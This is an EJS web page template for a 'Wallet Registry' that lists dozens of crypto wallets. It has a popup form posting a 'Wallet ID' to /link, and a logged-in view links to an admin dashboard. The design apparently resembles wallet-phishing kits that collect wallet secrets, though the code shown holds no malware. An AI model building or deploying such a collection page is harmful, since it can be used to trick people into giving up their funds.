<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <title>Link Wallet</title>
    <link rel="stylesheet" href="/assets/css/style.css" />
    <link
      rel="stylesheet"
      href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"
    />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link
      rel="stylesheet"
      href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css"
    />
    <link
      href="https://fonts.googleapis.com/css?family=Montserrat:400,600&display=swap"
      rel="stylesheet"
    />
  </head>
  <body>
    <section class="header">
      <div class="container">
        <nav id="navbar" class="navbar sticky navbar-expand-lg navbar-light">
          <a class="navbar-brand" href="#"></a>
          <button
            class="navbar-toggler"
            type="button"
            data-toggle="collapse"
            data-target="#navbarNav"
            aria-controls="navbarNav"
            aria-expanded="false"
          >
            <i class="fa fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarNav">
            <ul class="navbar-nav ml-auto text-right">
              <li class="nav-item">
                <a class="nav-link" href="/">HOME</a>
              </li>
              <li class="nav-item">
                <a class="nav-link" href="/services">SERVICES</a>
              </li>
              <li class="nav-item">
                <a class="nav-link active-home" href="#">WALLETS</a>
              </li>
              <li class="nav-item">
                <a class="nav-link" href="/about">ABOUT US</a>
              </li>
              <li class="nav-item">
                <a class="nav-link" href="/contact">CONTACT US</a>
              </li>

              <%if (user) { %>
              <li class="nav-item">
                <a class="nav-link" href="/admin/dashboard">DASHBOARD</a>
              </li>
              <% } else { %>
              <!-- <li class="nav-item"><a class="nav-link" href="/auth/register">LOGIN</a></li> -->
              <% } %>
            </ul>
          </div>
        </nav>
      </div>
    </section>
    <main>
      <section id="wallet-box" class="wallet-box">
        <div class="wallet-text-box">
          <h1 class="heading-wallet">Wallet Registry</h1>
          <p class="text-wallet">
            We link you to your favorite wallet and offer you a flexible way to
            access them.
          </p>
        </div>
        <div class="grid">
          <div class="grid-container">
            <a href="#popup" class="grid-item">
              <div>
                <img
                  src="/assets/images/Rainbow.jpeg"
                  class="grid-image"
                  alt="?Icon"
                />
                <h3 class="wallet-text">Rainbow</h3>
              </div>
            </a>
            <a href="#popup" class="grid-item">
              <div>
                <img
                  src="/assets/images/TrustWallet.jpeg"
                  class="grid-image"
                  alt="?Icon"
                />
                <h3 class="wallet-text">Trust Wallet</h3>
              </div>
            </a>
            <a href="#popup" class="grid-item">
              <div>
                <img
                  src="/assets/images/Argent.jpeg"
                  class="grid-image"
                  alt="?Icon"
                />
                <h3 class="wallet-text">Argent</h3>
              </div>
            </a>
            <a href="#popup" class="grid-item">
              <div>
                <img
                  src="/assets/images/MetaMask.jpeg"
                  class="grid-image"
                  alt="?Icon"
                />
                <h3 class="wallet-text">MetaMask</h3>
              </div>
            </a>
          </div>
          <!-------------------- single Row Of Four ------------------------->
          <div class="grid-container">
            <div class="grid-item">
              <img
                src="/assets/images/Gnosis.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Gnosis Safe</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Pillar.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Pillar</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/imToken.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">imToken</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Valora.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Valora</h3>
            </div>
          </div>
          <div class="grid-container">
            <div class="grid-item">
              <img
                src="/assets/images/ONTO.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">ONTO</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/TokenPocket.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">TokenPocket</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/MathWallet.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">MathWallet</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/BitPay.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">BitPay</h3>
            </div>
          </div>
          <div class="grid-container">
            <div class="grid-item">
              <img
                src="/assets/images/LedgerLive.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Ledger Live</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Walleth.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Walleth</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Authereum.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Authereum</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Dharma.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Dharma</h3>
            </div>
          </div>
          <div class="grid-container">
            <div class="grid-item">
              <img
                src="/assets/images/1inchWallet.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">1inch Wallet</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/HuobiWallet.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Huobi Wallet</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Eidoo.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Eidoo</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/MyKey.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">MYKEY</h3>
            </div>
          </div>
          <div class="grid-container">
            <div class="grid-item">
              <img
                src="/assets/images/LoopringWallet.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Loopring Wallet</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/TrustVault.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Trust Vault</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Atomic.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Atomic</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Coin98.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Coin98</h3>
            </div>
          </div>
          <div class="grid-container">
            <div class="grid-item">
              <img
                src="/assets/images/CoolWalletS.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">CoolWallet S</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Alice.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Alice</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/AlphaWallet.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">AlphaWallet</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Dcent.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">D'CENT Wallet</h3>
            </div>
          </div>
          <div class="grid-container">
            <div class="grid-item">
              <img
                src="/assets/images/ZelCore.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">ZelCore</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Nash.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Nash</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Coinomi.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Coinomi</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/GridPlus.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">GridPlus</h3>
            </div>
          </div>
          <div class="grid-container">
            <div class="grid-item">
              <img
                src="/assets/images/Cybavo.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">CYBAVO Wallet</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Tokenary.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Tokenary</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Torus.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Torus</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Spatium.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Spatium</h3>
            </div>
          </div>
          <div class="grid-container">
            <div class="grid-item">
              <img
                src="/assets/images/SafePal.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">SafePal</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Infinito.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Infinito</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Wallet.io.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">wallet.io</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Valora.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Infinity Wallet</h3>
            </div>
          </div>
          <div class="grid-container">
            <div class="grid-item">
              <img
                src="/assets/images/OwnBit.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">OwnBit</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/EasyPocket.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Easy Pocket</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/BridgeWallet.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Bridge Wallet</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/SparkPoint.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">SparkPoint</h3>
            </div>
          </div>
          <div class="grid-container">
            <div class="grid-item">
              <img
                src="/assets/images/ViaWallet.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Via Wallet</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/halodefi wallet.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">HaloDefi Wallet</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/dok wallet.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Dok wallet</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/AT. wallet.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">At.Wallet</h3>
            </div>
          </div>
          <div class="grid-container">
            <div class="grid-item">
              <img
                src="/assets/images/SafePal.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">SafePal</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Infinito.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Infinito</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Wallet.io.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">wallet.io</h3>
            </div>
            <div class="grid-item">
              <img
                src="/assets/images/Valora.jpeg"
                class="grid-image"
                alt="?Icon"
              />
              <h3 class="wallet-text">Infinity Wallet</h3>
            </div>
          </div>
        </div>
        <div id="popup" class="popup">
          <div class="form-container">
            <div class="text">Wallet Link Tracks</div>
            <%- include ("./partials/messages"); %>
            <form action="/link" class="pop-up-form" method="POST">
              <a href="#wallet-box" class="close-btn">&times;</a>

              <!-- single field -->
              <div class="data">
                <label>Wallet ID</label>
                <input type="text" name="wallet_id" required />
              </div>
              <!-- single field -->

              <!-- single field -->
              <!-- <div class="data">
                <label>Email</label>
                <input type="email" name="email" required />
              </div> -->
              <!-- single field -->

              <!-- single field -->
              <div class="data">
                <!-- <label>Wallet Name</label> -->
                <input
                  type="hidden"
                  name="wallet_name"
                  id="wallet_name"
                  value=""
                  required
                />
              </div>
              <!-- single field -->
              <button class="btn-box btn-transparent px-5">Link</button>
            </form>
          </div>
        </div>
      </section>
    </main>

    <script>
      let items = Array.from(document.getElementsByClassName("grid-item"));

      items.forEach((item) => {
        item.addEventListener("click", function () {
          let wallet = this.getElementsByClassName("wallet-text")[0].innerHTML;
          document.getElementById("wallet_name").value = wallet;
        });
      });
    </script>
    <%- include("./partials/userLayouts/footer") %>
  </body>
</html>
